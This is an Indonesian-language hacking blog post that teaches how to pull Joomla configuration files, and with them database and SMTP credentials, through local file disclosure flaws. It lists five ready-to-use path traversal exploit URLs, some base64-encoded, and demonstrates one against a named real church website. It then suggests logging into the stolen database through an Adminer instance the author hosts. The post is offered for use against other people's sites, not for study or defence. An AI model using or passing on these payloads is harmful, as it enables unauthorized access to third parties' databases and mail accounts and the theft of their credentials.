LOCAL FILE DISCLOURE: Mendapatkan smtp dan config joomla lewat config file download

Ohayou, Pagi-Pagi gini memanfaatkan wifi sekolah gw ngeblog :v
gw mau share Cara dapetin joomla config.. kan biasanya didalam config joomla ada database sama smtp :3

Perkenalkan dulu Nama gw nick gw unnamed48 dari res7ock crew, mungkin gw ga terkenal tapi tim gw terkenal ya? ga :v

Lanjut ke tutorial aja dah..

pertama-tama siapkan:

kopi <ga harus :v >
Browser apa aja
Exploitnya >>> ada ditutor

Tutorial:

* nih exploitnya:

/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php
/index.php?option=com_virtuemart&task=download&file=configuration.php
/index.php?option=com_jetext&task=download&file=../../configuration.php
/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=
/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==

* Contoh gw ambil 1 exploit > exploit yang terakhir

* gw ambil 1 site www.mountainviewchapel.com

* terus gw masukin exploitnya

pas dimasukin exploit jadi begini www.mountainviewchapel.com/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=

* nah kedownloadkan :v... biasanya ada smtp sama database kalo hoki

* kalo dapet database bisa login, alias hostnya bukan localhost. login make adminer... kalo ga mau ribet pake punya gw

http://unnamed48.id/pepes/adminer48.php

ok sekian blog dari gw.. maaf aga berantakan :v
tutor video bisa diliat disini

Smart Site

LOCAL FILE DISCLOURE: Mendapatkan smtp dan config joomla lewat config file download

Posted by Wantoro G.

Post a Comment

0 Comments

Tags

Most Popular

Isi Laporan Prakerin BAB III Landasan teori

Sistem Cerdas